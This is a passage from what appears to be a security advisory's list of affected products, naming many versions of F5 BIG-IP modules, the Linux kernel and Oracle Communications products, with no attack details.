12.1.1 \n * F5 BIG-IP GTM 12.1.1 HF2 \n * F5 BIG-IP GTM 12.1.2 \n * F5 BIG-IP GTM 12.1.2 HF1 \n * F5 BIG-IP GTM 12.1.3 \n * F5 BIG-IP GTM 12.1.3.2 \n * F5 BIG-IP GTM 12.1.3.4 \n * F5 BIG-IP GTM 12.1.3.6 \n * F5 BIG-IP GTM 12.1.3.7 \n * F5 BIG-IP GTM 12.1.4 \n * F5 BIG-IP GTM 13.1.0 \n * F5 BIG-IP GTM 13.1.0.4 \n * F5 BIG-IP GTM 13.1.0.5 \n * F5 BIG-IP GTM 13.1.0.6 \n * F5 BIG-IP GTM 13.1.0.8 \n * F5 BIG-IP GTM 13.1.1 \n * F5 BIG-IP GTM 14.0.0 \n * F5 BIG-IP GTM 14.0.0.3 \n * F5 BIG-IP GTM 14.1.0 \n * F5 BIG-IP GTM 15.0.0 \n * F5 BIG-IP LTM 11.5.2 \n * F5 BIG-IP LTM 11.5.3 \n * F5 BIG-IP LTM 11.5.3 HF1 \n * F5 BIG-IP LTM 11.5.3 HF2 \n * F5 BIG-IP LTM 11.5.4 \n * F5 BIG-IP LTM 11.5.4 HF1 \n * F5 BIG-IP LTM 11.5.4 HF2 \n * F5 BIG-IP LTM 11.5.4 HF3 \n * F5 BIG-IP LTM 11.5.4 build 0.1.256 \n * F5 BIG-IP LTM 11.5.5 \n * F5 BIG-IP LTM 11.5.6 \n * F5 BIG-IP LTM 11.5.7 \n * F5 BIG-IP LTM 11.5.8 \n * F5 BIG-IP LTM 11.5.9 \n * F5 BIG-IP LTM 11.6.0 \n * F5 BIG-IP LTM 11.6.0 HF4 \n * F5 BIG-IP LTM 11.6.0 HF5 \n * F5 BIG-IP LTM 11.6.0 HF6 \n * F5 BIG-IP LTM 11.6.0 HF7 \n * F5 BIG-IP LTM 11.6.0 HF8 \n * F5 BIG-IP LTM 11.6.0 build 6.204.442 \n * F5 BIG-IP LTM 11.6.1 \n * F5 BIG-IP LTM 11.6.1 HF1 \n * F5 BIG-IP LTM 11.6.1 HF2 \n * F5 BIG-IP LTM 11.6.2 \n * F5 BIG-IP LTM 11.6.2 HF1 \n * F5 BIG-IP LTM 11.6.3 \n * F5 BIG-IP LTM 11.6.3.2 \n * F5 BIG-IP LTM 11.6.3.3 \n * F5 BIG-IP LTM 11.6.4 \n * F5 BIG-IP LTM 12.1.0 \n * F5 BIG-IP LTM 12.1.0 HF1 \n * F5 BIG-IP LTM 12.1.0 HF2 \n * F5 BIG-IP LTM 12.1.1 \n * F5 BIG-IP LTM 12.1.1 HF2 \n * F5 BIG-IP LTM 12.1.2 \n * F5 BIG-IP LTM 12.1.2 HF1 \n * F5 BIG-IP LTM 12.1.2 HF2 \n * F5 BIG-IP LTM 12.1.3 \n * F5 BIG-IP LTM 12.1.3.2 \n * F5 BIG-IP LTM 12.1.3.4 \n * F5 BIG-IP LTM 12.1.3.6 \n * F5 BIG-IP LTM 12.1.3.7 \n * F5 BIG-IP LTM 12.1.4 \n * F5 BIG-IP LTM 13.1.0 \n * F5 BIG-IP LTM 13.1.0.4 \n * F5 BIG-IP LTM 13.1.0.5 \n * F5 BIG-IP LTM 13.1.0.6 \n * F5 BIG-IP LTM 13.1.0.8 \n * F5 BIG-IP LTM 13.1.1 \n * F5 BIG-IP LTM 14.0.0 \n * F5 BIG-IP LTM 14.0.0.3 \n * F5 BIG-IP LTM 14.0.2 \n * F5 BIG-IP LTM 14.1.0 \n * F5 BIG-IP LTM 15.0.0 \n * F5 BIG-IP Link Controller 11.5.2 \n * F5 BIG-IP Link Controller 11.5.3 \n * F5 BIG-IP Link Controller 11.5.3 HF1 \n * F5 BIG-IP Link Controller 11.5.3 HF2 \n * F5 BIG-IP Link Controller 11.5.4 \n * F5 BIG-IP Link Controller 11.5.4 HF1 \n * F5 BIG-IP Link Controller 11.5.4 HF2 \n * F5 BIG-IP Link Controller 11.5.4 HF3 \n * F5 BIG-IP Link Controller 11.5.4 build 0.1.256 \n * F5 BIG-IP Link Controller 11.5.5 \n * F5 BIG-IP Link Controller 11.5.6 \n * F5 BIG-IP Link Controller 11.5.7 \n * F5 BIG-IP Link Controller 11.5.8 \n * F5 BIG-IP Link Controller 11.5.9 \n * F5 BIG-IP Link Controller 11.6.0 \n * F5 BIG-IP Link Controller 11.6.0 HF4 \n * F5 BIG-IP Link Controller 11.6.0 HF5 \n * F5 BIG-IP Link Controller 11.6.0 HF6 \n * F5 BIG-IP Link Controller 11.6.0 HF8 \n * F5 BIG-IP Link Controller 11.6.0 build 6.204.442 \n * F5 BIG-IP Link Controller 11.6.1 \n * F5 BIG-IP Link Controller 11.6.1 HF1 \n * F5 BIG-IP Link Controller 11.6.1 HF2 \n * F5 BIG-IP Link Controller 11.6.2 \n * F5 BIG-IP Link Controller 11.6.2 HF1 \n * F5 BIG-IP Link Controller 11.6.3 \n * F5 BIG-IP Link Controller 11.6.3.2 \n * F5 BIG-IP Link Controller 11.6.3.3 \n * F5 BIG-IP Link Controller 11.6.4 \n * F5 BIG-IP Link Controller 12.1.0 \n * F5 BIG-IP Link Controller 12.1.0 HF1 \n * F5 BIG-IP Link Controller 12.1.0 HF2 \n * F5 BIG-IP Link Controller 12.1.1 \n * F5 BIG-IP Link Controller 12.1.1 HF2 \n * F5 BIG-IP Link Controller 12.1.2 \n * F5 BIG-IP Link Controller 12.1.2 HF1 \n * F5 BIG-IP Link Controller 12.1.2 HF2 \n * F5 BIG-IP Link Controller 12.1.3 \n * F5 BIG-IP Link Controller 12.1.3.2 \n * F5 BIG-IP Link Controller 12.1.3.4 \n * F5 BIG-IP Link Controller 12.1.3.6 \n * F5 BIG-IP Link Controller 12.1.4 \n * F5 BIG-IP Link Controller 13.1.0 \n * F5 BIG-IP Link Controller 13.1.0.4 \n * F5 BIG-IP Link Controller 13.1.0.5 \n * F5 BIG-IP Link Controller 13.1.0.6 \n * F5 BIG-IP Link Controller 13.1.0.8 \n * F5 BIG-IP Link Controller 13.1.1 \n * F5 BIG-IP Link Controller 14.0.0 \n * F5 BIG-IP Link Controller 14.0.0.3 \n * F5 BIG-IP Link Controller 14.1.0 \n * F5 BIG-IP Link Controller 15.0.0 \n * F5 BIG-IP PEM 11.5.2 \n * F5 BIG-IP PEM 11.5.3 \n * F5 BIG-IP PEM 11.5.3 HF1 \n * F5 BIG-IP PEM 11.5.3 HF2 \n * F5 BIG-IP PEM 11.5.4 \n * F5 BIG-IP PEM 11.5.4 HF1 \n * F5 BIG-IP PEM 11.5.4 HF2 \n * F5 BIG-IP PEM 11.5.4 HF3 \n * F5 BIG-IP PEM 11.5.5 \n * F5 BIG-IP PEM 11.5.6 \n * F5 BIG-IP PEM 11.5.7 \n * F5 BIG-IP PEM 11.5.8 \n * F5 BIG-IP PEM 11.5.9 \n * F5 BIG-IP PEM 11.6.0 \n * F5 BIG-IP PEM 11.6.0 HF4 \n * F5 BIG-IP PEM 11.6.0 HF5 \n * F5 BIG-IP PEM 11.6.0 HF6 \n * F5 BIG-IP PEM 11.6.0 HF8 \n * F5 BIG-IP PEM 11.6.1 \n * F5 BIG-IP PEM 11.6.1 HF1 \n * F5 BIG-IP PEM 11.6.1 HF2 \n * F5 BIG-IP PEM 11.6.2 \n * F5 BIG-IP PEM 11.6.2 HF1 \n * F5 BIG-IP PEM 11.6.3 \n * F5 BIG-IP PEM 11.6.3.2 \n * F5 BIG-IP PEM 11.6.3.3 \n * F5 BIG-IP PEM 11.6.4 \n * F5 BIG-IP PEM 12.1.0 \n * F5 BIG-IP PEM 12.1.0 HF1 \n * F5 BIG-IP PEM 12.1.0 HF2 \n * F5 BIG-IP PEM 12.1.1 \n * F5 BIG-IP PEM 12.1.1 HF2 \n * F5 BIG-IP PEM 12.1.2 \n * F5 BIG-IP PEM 12.1.2 HF 1 \n * F5 BIG-IP PEM 12.1.2 HF1 \n * F5 BIG-IP PEM 12.1.2 HF2 \n * F5 BIG-IP PEM 12.1.3 \n * F5 BIG-IP PEM 12.1.3.2 \n * F5 BIG-IP PEM 12.1.3.4 \n * F5 BIG-IP PEM 12.1.3.6 \n * F5 BIG-IP PEM 12.1.4 \n * F5 BIG-IP PEM 13.1.0 \n * F5 BIG-IP PEM 13.1.0.4 \n * F5 BIG-IP PEM 13.1.0.5 \n * F5 BIG-IP PEM 13.1.0.6 \n * F5 BIG-IP PEM 13.1.0.8 \n * F5 BIG-IP PEM 13.1.1 \n * F5 BIG-IP PEM 14.0.0 \n * F5 BIG-IP PEM 14.0.0.3 \n * F5 BIG-IP PEM 14.1.0 \n * F5 BIG-IP PEM 15.0.0 \n * F5 BIG-IP WebAccelerator 11.5.2 \n * F5 BIG-IP WebAccelerator 11.5.4 HF2 \n * F5 BIG-IP WebAccelerator 11.5.5 \n * F5 BIG-IP WebAccelerator 11.5.6 \n * F5 BIG-IP WebAccelerator 11.5.7 \n * F5 BIG-IP WebAccelerator 11.5.8 \n * F5 BIG-IP WebAccelerator 11.5.9 \n * F5 BIG-IP WebAccelerator 11.6.0 \n * F5 BIG-IP WebAccelerator 11.6.1 \n * F5 BIG-IP WebAccelerator 11.6.2 \n * F5 BIG-IP WebAccelerator 11.6.3 \n * F5 BIG-IP WebAccelerator 11.6.3.2 \n * F5 BIG-IP WebAccelerator 11.6.3.3 \n * F5 BIG-IP WebAccelerator 11.6.4 \n * F5 BIG-IP WebAccelerator 12.1.0 \n * F5 BIG-IP WebAccelerator 12.1.1 \n * F5 BIG-IP WebAccelerator 12.1.1 HF2 \n * F5 BIG-IP WebAccelerator 12.1.2 \n * F5 BIG-IP WebAccelerator 12.1.3 \n * F5 BIG-IP WebAccelerator 12.1.3.2 \n * F5 BIG-IP WebAccelerator 12.1.3.4 \n * F5 BIG-IP WebAccelerator 12.1.3.6 \n * F5 BIG-IP WebAccelerator 12.1.4 \n * F5 BIG-IP WebAccelerator 13.1.0 \n * F5 BIG-IP WebAccelerator 13.1.0.4 \n * F5 BIG-IP WebAccelerator 13.1.0.5 \n * F5 BIG-IP WebAccelerator 13.1.0.6 \n * F5 BIG-IP WebAccelerator 13.1.0.8 \n * F5 BIG-IP WebAccelerator 13.1.1 \n * F5 BIG-IP WebAccelerator 14.0.0 \n * F5 BIG-IP WebAccelerator 14.0.0.3 \n * F5 BIG-IP WebAccelerator 14.1.0 \n * F5 BIG-IP WebAccelerator 15.0.0 \n * Linux kernel 2.6.0 \n * Linux kernel 2.6.1 \n * Linux kernel 2.6.11 .11 \n * Linux kernel 2.6.11 .12 \n * Linux kernel 2.6.11 .4 \n * Linux kernel 2.6.11 .5 \n * Linux kernel 2.6.11 .6 \n * Linux kernel 2.6.11 .7 \n * Linux kernel 2.6.11 .8 \n * Linux kernel 2.6.11 \n * Linux kernel 2.6.11.1 \n * Linux kernel 2.6.11.10 \n * Linux kernel 2.6.11.11 \n * Linux kernel 2.6.11.12 \n * Linux kernel 2.6.11.2 \n * Linux kernel 2.6.11.3 \n * Linux kernel 2.6.11.4 \n * Linux kernel 2.6.11.5 \n * Linux kernel 2.6.11.6 \n * Linux kernel 2.6.11.7 \n * Linux kernel 2.6.11.8 \n * Linux kernel 2.6.11.9 \n * Linux kernel 2.6.12 .1 \n * Linux kernel 2.6.12 .12 \n * Linux kernel 2.6.12 .2 \n * Linux kernel 2.6.12 .22 \n * Linux kernel 2.6.12 .3 \n * Linux kernel 2.6.12 .4 \n * Linux kernel 2.6.12 .5 \n * Linux kernel 2.6.12 .6 \n * Linux kernel 2.6.12 \n * Linux kernel 2.6.12.1 \n * Linux kernel 2.6.12.2 \n * Linux kernel 2.6.12.3 \n * Linux kernel 2.6.12.4 \n * Linux kernel 2.6.12.5 \n * Linux kernel 2.6.12.6 \n * Linux kernel 2.6.13 .1 \n * Linux kernel 2.6.13 .2 \n * Linux kernel 2.6.13 .3 \n * Linux kernel 2.6.13 .4 \n * Linux kernel 2.6.13 \n * Linux kernel 2.6.13.2 \n * Linux kernel 2.6.13.3 \n * Linux kernel 2.6.13.4 \n * Linux kernel 2.6.13.5 \n * Linux kernel 2.6.14 .1 \n * Linux kernel 2.6.14 .2 \n * Linux kernel 2.6.14 .3 \n * Linux kernel 2.6.14 \n * Linux kernel 2.6.14.1 \n * Linux kernel 2.6.14.2 \n * Linux kernel 2.6.14.3 \n * Linux kernel 2.6.14.4 \n * Linux kernel 2.6.14.5 \n * Linux kernel 2.6.14.6 \n * Linux kernel 2.6.14.7 \n * Linux kernel 2.6.15 .4 \n * Linux kernel 2.6.15 \n * Linux kernel 2.6.15.1 \n * Linux kernel 2.6.15.11 \n * Linux kernel 2.6.15.2 \n * Linux kernel 2.6.15.3 \n * Linux kernel 2.6.15.4 \n * Linux kernel 2.6.15.5 \n * Linux kernel 2.6.15.6 \n * Linux kernel 2.6.15.7 \n * Linux kernel 2.6.16 .1 \n * Linux kernel 2.6.16 .11 \n * Linux kernel 2.6.16 .12 \n * Linux kernel 2.6.16 .19 \n * Linux kernel 2.6.16 .23 \n * Linux kernel 2.6.16 .7 \n * Linux kernel 2.6.16 .9 \n * Linux kernel 2.6.16 13 \n * Linux kernel 2.6.16 27 \n * Linux kernel 2.6.16 \n * Linux kernel 2.6.16.10 \n * Linux kernel 2.6.16.11 \n * Linux kernel 2.6.16.12 \n * Linux kernel 2.6.16.13 \n * Linux kernel 2.6.16.14 \n * Linux kernel 2.6.16.15 \n * Linux kernel 2.6.16.16 \n * Linux kernel 2.6.16.17 \n * Linux kernel 2.6.16.18 \n * Linux kernel 2.6.16.19 \n * Linux kernel 2.6.16.2 \n * Linux kernel 2.6.16.20 \n * Linux kernel 2.6.16.21 \n * Linux kernel 2.6.16.22 \n * Linux kernel 2.6.16.24 \n * Linux kernel 2.6.16.25 \n * Linux kernel 2.6.16.26 \n * Linux kernel 2.6.16.27 \n * Linux kernel 2.6.16.28 \n * Linux kernel 2.6.16.29 \n * Linux kernel 2.6.16.3 \n * Linux kernel 2.6.16.30 \n * Linux kernel 2.6.16.31 \n * Linux kernel 2.6.16.32 \n * Linux kernel 2.6.16.33 \n * Linux kernel 2.6.16.34 \n * Linux kernel 2.6.16.35 \n * Linux kernel 2.6.16.36 \n * Linux kernel 2.6.16.37 \n * Linux kernel 2.6.16.38 \n * Linux kernel 2.6.16.39 \n * Linux kernel 2.6.16.4 \n * Linux kernel 2.6.16.40 \n * Linux kernel 2.6.16.41 \n * Linux kernel 2.6.16.43 \n * Linux kernel 2.6.16.44 \n * Linux kernel 2.6.16.45 \n * Linux kernel 2.6.16.46 \n * Linux kernel 2.6.16.47 \n * Linux kernel 2.6.16.48 \n * Linux kernel 2.6.16.49 \n * Linux kernel 2.6.16.5 \n * Linux kernel 2.6.16.50 \n * Linux kernel 2.6.16.51 \n * Linux kernel 2.6.16.52 \n * Linux kernel 2.6.16.53 \n * Linux kernel 2.6.16.6 \n * Linux kernel 2.6.16.7 \n * Linux kernel 2.6.16.8 \n * Linux kernel 2.6.16.9 \n * Linux kernel 2.6.17 .8 \n * Linux kernel 2.6.17 \n * Linux kernel 2.6.17.1 \n * Linux kernel 2.6.17.10 \n * Linux kernel 2.6.17.11 \n * Linux kernel 2.6.17.12 \n * Linux kernel 2.6.17.13 \n * Linux kernel 2.6.17.14 \n * Linux kernel 2.6.17.2 \n * Linux kernel 2.6.17.3 \n * Linux kernel 2.6.17.4 \n * Linux kernel 2.6.17.5 \n * Linux kernel 2.6.17.6 \n * Linux kernel 2.6.17.7 \n * Linux kernel 2.6.17.9 \n * Linux kernel 2.6.18 .1 \n * Linux kernel 2.6.18 \n * Linux kernel 2.6.18.2 \n * Linux kernel 2.6.18.3 \n * Linux kernel 2.6.18.4 \n * Linux kernel 2.6.18.5 \n * Linux kernel 2.6.18.6 \n * Linux kernel 2.6.18.7 \n * Linux kernel 2.6.18.8 \n * Linux kernel 2.6.19 \n * Linux kernel 2.6.19.1 \n * Linux kernel 2.6.19.2 \n * Linux kernel 2.6.19.3 \n * Linux kernel 2.6.19.4 \n * Linux kernel 2.6.2 \n * Linux kernel 2.6.20 \n * Linux kernel 2.6.20-2 \n * Linux kernel 2.6.20.1 \n * Linux kernel 2.6.20.10 \n * Linux kernel 2.6.20.11 \n * Linux kernel 2.6.20.12 \n * Linux kernel 2.6.20.13 \n * Linux kernel 2.6.20.14 \n * Linux kernel 2.6.20.15 \n * Linux kernel 2.6.20.2 \n * Linux kernel 2.6.20.3 \n * Linux kernel 2.6.20.4 \n * Linux kernel 2.6.20.5 \n * Linux kernel 2.6.20.6 \n * Linux kernel 2.6.20.7 \n * Linux kernel 2.6.20.8 \n * Linux kernel 2.6.20.9 \n * Linux kernel 2.6.21 .1 \n * Linux kernel 2.6.21 4 \n * Linux kernel 2.6.21 \n * Linux kernel 2.6.21.2 \n * Linux kernel 2.6.21.3 \n * Linux kernel 2.6.21.6 \n * Linux kernel 2.6.21.7 \n * Linux kernel 2.6.22 \n * Linux kernel 2.6.22.1 \n * Linux kernel 2.6.22.11 \n * Linux kernel 2.6.22.12 \n * Linux kernel 2.6.22.13 \n * Linux kernel 2.6.22.14 \n * Linux kernel 2.6.22.15 \n * Linux kernel 2.6.22.16 \n * Linux kernel 2.6.22.17 \n * Linux kernel 2.6.23.1 \n * Linux kernel 2.6.23.10 \n * Linux kernel 2.6.23.14 \n * Linux kernel 2.6.23.2 \n * Linux kernel 2.6.23.3 \n * Linux kernel 2.6.23.4 \n * Linux kernel 2.6.23.5 \n * Linux kernel 2.6.23.6 \n * Linux kernel 2.6.24 \n * Linux kernel 2.6.24.1 \n * Linux kernel 2.6.24.2 \n * Linux kernel 2.6.25 19 \n * Linux kernel 2.6.25.1 \n * Linux kernel 2.6.25.2 \n * Linux kernel 2.6.25.3 \n * Linux kernel 2.6.25.4 \n * Linux kernel 2.6.25.6 \n * Linux kernel 2.6.25.7 \n * Linux kernel 2.6.25.8 \n * Linux kernel 2.6.25.9 \n * Linux kernel 2.6.26 7 \n * Linux kernel 2.6.26 \n * Linux kernel 2.6.26.3 \n * Linux kernel 2.6.26.4 \n * Linux kernel 2.6.26.5 \n * Linux kernel 2.6.26.6 \n * Linux kernel 2.6.27.12 \n * Linux kernel 2.6.27.13 \n * Linux kernel 2.6.27.14 \n * Linux kernel 2.6.27.24 \n * Linux kernel 2.6.27.46 \n * Linux kernel 2.6.27.8 \n * Linux kernel 2.6.28.1 \n * Linux kernel 2.6.28.2 \n * Linux kernel 2.6.28.3 \n * Linux kernel 2.6.28.4 \n * Linux kernel 2.6.28.5 \n * Linux kernel 2.6.28.6 \n * Linux kernel 2.6.28.8 \n * Linux kernel 2.6.29 \n * Linux kernel 2.6.29.1 \n * Linux kernel 2.6.29.4 \n * Linux kernel 2.6.3 \n * Linux kernel 2.6.30 \n * Linux kernel 2.6.30.1 \n * Linux kernel 2.6.30.10 \n * Linux kernel 2.6.30.3 \n * Linux kernel 2.6.30.4 \n * Linux kernel 2.6.30.5 \n * Linux kernel 2.6.31 \n * Linux kernel 2.6.31.1 \n * Linux kernel 2.6.31.11 \n * Linux kernel 2.6.31.13 \n * Linux kernel 2.6.31.2 \n * Linux kernel 2.6.31.4 \n * Linux kernel 2.6.31.5 \n * Linux kernel 2.6.31.6 \n * Linux kernel 2.6.32 \n * Linux kernel 2.6.32.1 \n * Linux kernel 2.6.32.10 \n * Linux kernel 2.6.32.11 \n * Linux kernel 2.6.32.12 \n * Linux kernel 2.6.32.13 \n * Linux kernel 2.6.32.14 \n * Linux kernel 2.6.32.15 \n * Linux kernel 2.6.32.16 \n * Linux kernel 2.6.32.17 \n * Linux kernel 2.6.32.18 \n * Linux kernel 2.6.32.2 \n * Linux kernel 2.6.32.22 \n * Linux kernel 2.6.32.28 \n * Linux kernel 2.6.32.3 \n * Linux kernel 2.6.32.4 \n * Linux kernel 2.6.32.5 \n * Linux kernel 2.6.32.6 \n * Linux kernel 2.6.32.60 \n * Linux kernel 2.6.32.61 \n * Linux kernel 2.6.32.62 \n * Linux kernel 2.6.32.7 \n * Linux kernel 2.6.32.8 \n * Linux kernel 2.6.32.9 \n * Linux kernel 3.0.1 \n * Linux kernel 3.0.18 \n * Linux kernel 3.0.2 \n * Linux kernel 3.0.34 \n * Linux kernel 3.0.37 \n * Linux kernel 3.0.4 \n * Linux kernel 3.0.5 \n * Linux kernel 3.0.58 \n * Linux kernel 3.0.59 \n * Linux kernel 3.0.60 \n * Linux kernel 3.0.62 \n * Linux kernel 3.0.65 \n * Linux kernel 3.0.66 \n * Linux kernel 3.0.69 \n * Linux kernel 3.0.72 \n * Linux kernel 3.0.75 \n * Linux kernel 3.0.98 \n * Linux kernel 3.1 \n * Linux kernel 3.1.8 \n * Linux kernel 3.10 \n * Linux kernel 3.10.0 \n * Linux kernel 3.10.10 \n * Linux kernel 3.10.14 \n * Linux kernel 3.10.17 \n * Linux kernel 3.10.20 \n * Linux kernel 3.10.21 \n * Linux kernel 3.10.22 \n * Linux kernel 3.10.23 \n * Linux kernel 3.10.26 \n * Linux kernel 3.10.27 \n * Linux kernel 3.10.30 \n * Linux kernel 3.10.31 \n * Linux kernel 3.10.36 \n * Linux kernel 3.10.37 \n * Linux kernel 3.10.38 \n * Linux kernel 3.10.41 \n * Linux kernel 3.10.43 \n * Linux kernel 3.10.45 \n * Linux kernel 3.10.5 \n * Linux kernel 3.10.7 \n * Linux kernel 3.10.73 \n * Linux kernel 3.10.81 \n * Linux kernel 3.10.9 \n * Linux kernel 3.10.90 \n * Linux kernel 3.11 \n * Linux kernel 3.11.3 \n * Linux kernel 3.11.6 \n * Linux kernel 3.11.9 \n * Linux kernel 3.12 \n * Linux kernel 3.12.1 \n * Linux kernel 3.12.11 \n * Linux kernel 3.12.12 \n * Linux kernel 3.12.14 \n * Linux kernel 3.12.15 \n * Linux kernel 3.12.16 \n * Linux kernel 3.12.17 \n * Linux kernel 3.12.18 \n * Linux kernel 3.12.2 \n * Linux kernel 3.12.21 \n * Linux kernel 3.12.22 \n * Linux kernel 3.12.3 \n * Linux kernel 3.12.4 \n * Linux kernel 3.12.40 \n * Linux kernel 3.12.44 \n * Linux kernel 3.12.48 \n * Linux kernel 3.12.49 \n * Linux kernel 3.12.7 \n * Linux kernel 3.13 \n * Linux kernel 3.13.0 \n * Linux kernel 3.13.1 \n * Linux kernel 3.13.11 \n * Linux kernel 3.13.3 \n * Linux kernel 3.13.4 \n * Linux kernel 3.13.5 \n * Linux kernel 3.13.6 \n * Linux kernel 3.13.7 \n * Linux kernel 3.13.9 \n * Linux kernel 3.14 \n * Linux kernel 3.14-1 \n * Linux kernel 3.14-4 \n * Linux kernel 3.14.2 \n * Linux kernel 3.14.3 \n * Linux kernel 3.14.37 \n * Linux kernel 3.14.4 \n * Linux kernel 3.14.45 \n * Linux kernel 3.14.5 \n * Linux kernel 3.14.54 \n * Linux kernel 3.14.7 \n * Linux kernel 3.14.73 \n * Linux kernel 3.14.79 \n * Linux kernel 3.15 \n * Linux kernel 3.15.10 \n * Linux kernel 3.15.2 \n * Linux kernel 3.15.5 \n * Linux kernel 3.16 \n * Linux kernel 3.16.0-28 \n * Linux kernel 3.16.1 \n * Linux kernel 3.16.2 \n * Linux kernel 3.16.36 \n * Linux kernel 3.16.6 \n * Linux kernel 3.16.7 \n * Linux kernel 3.17 \n * Linux kernel 3.17.2 \n * Linux kernel 3.17.4 \n * Linux kernel 3.17.6 \n * Linux kernel 3.18 \n * Linux kernel 3.18.1 \n * Linux kernel 3.18.11 \n * Linux kernel 3.18.17 \n * Linux kernel 3.18.2 \n * Linux kernel 3.18.22 \n * Linux kernel 3.18.3 \n * Linux kernel 3.18.7 \n * Linux kernel 3.18.8 \n * Linux kernel 3.18.9 \n * Linux kernel 3.19 \n * Linux kernel 3.19.3 \n * Linux kernel 3.2 \n * Linux kernel 3.2.1 \n * Linux kernel 3.2.12 \n * Linux kernel 3.2.13 \n * Linux kernel 3.2.2 \n * Linux kernel 3.2.23 \n * Linux kernel 3.2.24 \n * Linux kernel 3.2.38 \n * Linux kernel 3.2.42 \n * Linux kernel 3.2.44 \n * Linux kernel 3.2.50 \n * Linux kernel 3.2.51 \n * Linux kernel 3.2.52 \n * Linux kernel 3.2.53 \n * Linux kernel 3.2.54 \n * Linux kernel 3.2.55 \n * Linux kernel 3.2.56 \n * Linux kernel 3.2.57 \n * Linux kernel 3.2.60 \n * Linux kernel 3.2.62 \n * Linux kernel 3.2.63 \n * Linux kernel 3.2.72 \n * Linux kernel 3.2.78 \n * Linux kernel 3.2.81 \n * Linux kernel 3.2.82 \n * Linux kernel 3.2.9 \n * Linux kernel 3.3 \n * Linux kernel 3.3.2 \n * Linux kernel 3.3.4 \n * Linux kernel 3.3.5 \n * Linux kernel 3.4 \n * Linux kernel 3.4.1 \n * Linux kernel 3.4.10 \n * Linux kernel 3.4.11 \n * Linux kernel 3.4.12 \n * Linux kernel 3.4.13 \n * Linux kernel 3.4.14 \n * Linux kernel 3.4.15 \n * Linux kernel 3.4.16 \n * Linux kernel 3.4.17 \n * Linux kernel 3.4.18 \n * Linux kernel 3.4.19 \n * Linux kernel 3.4.2 \n * Linux kernel 3.4.20 \n * Linux kernel 3.4.21 \n * Linux kernel 3.4.25 \n * Linux kernel 3.4.26 \n * Linux kernel 3.4.27 \n * Linux kernel 3.4.29 \n * Linux kernel 3.4.3 \n * Linux kernel 3.4.31 \n * Linux kernel 3.4.32 \n * Linux kernel 3.4.36 \n * Linux kernel 3.4.4 \n * Linux kernel 3.4.42 \n * Linux kernel 3.4.5 \n * Linux kernel 3.4.58 \n * Linux kernel 3.4.6 \n * Linux kernel 3.4.64 \n * Linux kernel 3.4.67 \n * Linux kernel 3.4.7 \n * Linux kernel 3.4.70 \n * Linux kernel 3.4.71 \n * Linux kernel 3.4.72 \n * Linux kernel 3.4.73 \n * Linux kernel 3.4.76 \n * Linux kernel 3.4.8 \n * Linux kernel 3.4.80 \n * Linux kernel 3.4.81 \n * Linux kernel 3.4.86 \n * Linux kernel 3.4.87 \n * Linux kernel 3.4.88 \n * Linux kernel 3.4.9 \n * Linux kernel 3.4.93 \n * Linux kernel 3.5 \n * Linux kernel 3.5.1 \n * Linux kernel 3.5.2 \n * Linux kernel 3.5.3 \n * Linux kernel 3.5.4 \n * Linux kernel 3.5.5 \n * Linux kernel 3.5.6 \n * Linux kernel 3.5.7 \n * Linux kernel 3.6 \n * Linux kernel 3.6.1 \n * Linux kernel 3.6.10 \n * Linux kernel 3.6.11 \n * Linux kernel 3.6.2 \n * Linux kernel 3.6.3 \n * Linux kernel 3.6.4 \n * Linux kernel 3.6.5 \n * Linux kernel 3.6.6 \n * Linux kernel 3.6.7 \n * Linux kernel 3.6.8 \n * Linux kernel 3.6.9 \n * Linux kernel 3.7 \n * Linux kernel 3.7.1 \n * Linux kernel 3.7.10 \n * Linux kernel 3.7.2 \n * Linux kernel 3.7.3 \n * Linux kernel 3.7.4 \n * Linux kernel 3.7.5 \n * Linux kernel 3.7.6 \n * Linux kernel 3.7.7 \n * Linux kernel 3.7.8 \n * Linux kernel 3.7.9 \n * Linux kernel 3.8 \n * Linux kernel 3.8.1 \n * Linux kernel 3.8.2 \n * Linux kernel 3.8.4 \n * Linux kernel 3.8.5 \n * Linux kernel 3.8.6 \n * Linux kernel 3.8.9 \n * Linux kernel 3.9 \n * Linux kernel 3.9.4 \n * Linux kernel 3.9.8 \n * Linux kernel 4.0 \n * Linux kernel 4.0.5 \n * Linux kernel 4.0.6 \n * Linux kernel 4.1 \n * Linux kernel 4.1.1 \n * Linux kernel 4.1.15 \n * Linux kernel 4.1.4 \n * Linux kernel 4.10.0 \n * Linux kernel 4.10.1 \n * Linux kernel 4.10.10 \n * Linux kernel 4.10.11 \n * Linux kernel 4.10.12 \n * Linux kernel 4.10.13 \n * Linux kernel 4.10.2 \n * Linux kernel 4.10.3 \n * Linux kernel 4.10.4 \n * Linux kernel 4.15 \n * Linux kernel 4.15.11 \n * Linux kernel 4.15.14 \n * Linux kernel 4.15.16 \n * Linux kernel 4.15.4 \n * Linux kernel 4.15.7 \n * Linux kernel 4.15.8 \n * Linux kernel 4.15.9 \n * Linux kernel 4.16 \n * Linux kernel 4.16.11 \n * Linux kernel 4.16.3 \n * Linux kernel 4.16.6 \n * Linux kernel 4.16.9 \n * Linux kernel 4.17 \n * Linux kernel 4.17.1 \n * Linux kernel 4.17.10 \n * Linux kernel 4.17.11 \n * Linux kernel 4.17.2 \n * Linux kernel 4.17.3 \n * Linux kernel 4.17.4 \n * Linux kernel 4.17.7 \n * Linux kernel 4.18 \n * Linux kernel 4.18.1 \n * Linux kernel 4.18.11 \n * Linux kernel 4.18.12 \n * Linux kernel 4.18.16 \n * Linux kernel 4.18.5 \n * Linux kernel 4.18.6 \n * Linux kernel 4.18.9 \n * Linux kernel 4.19 \n * Linux kernel 4.19.13 \n * Linux kernel 4.19.2 \n * Linux kernel 4.19.3 \n * Linux kernel 4.19.6 \n * Linux kernel 4.19.8 \n * Linux kernel 4.2 \n * Linux kernel 4.2.3 \n * Linux kernel 4.2.8 \n * Linux kernel 4.3.3 \n * Oracle Communications Session Border Controller 7.4.0 \n * Oracle Communications Session Border Controller 8.0.0 \n * Oracle Communications Session Border Controller 8.1.0 \n * Oracle Communications Session Border Controller 8.2.0 \n * Oracle Communications Session Border Controller 8.3.0 \n * Oracle Communications Session Router 7.4 \n * Oracle Communications Session Router 8.0 \n * Oracle Communications Session Router 8.1 \n * Oracle Communications Session Router 8.2 \n * Oracle Communications Subscriber-Aware Load Balancer 7.3 \n * Oracle Communications Subscriber-Aware Load Balancer 8.1 \n * Oracle Communications Subscriber-Aware Load Balancer 8.3 \n * Oracle Enterprise Communications Broker PCz3.0 \n * Oracle Enterprise Communications Broker PCz3.1 \n * Oracle Enterprise Communications Broker PCz3.2 \n * Oracle 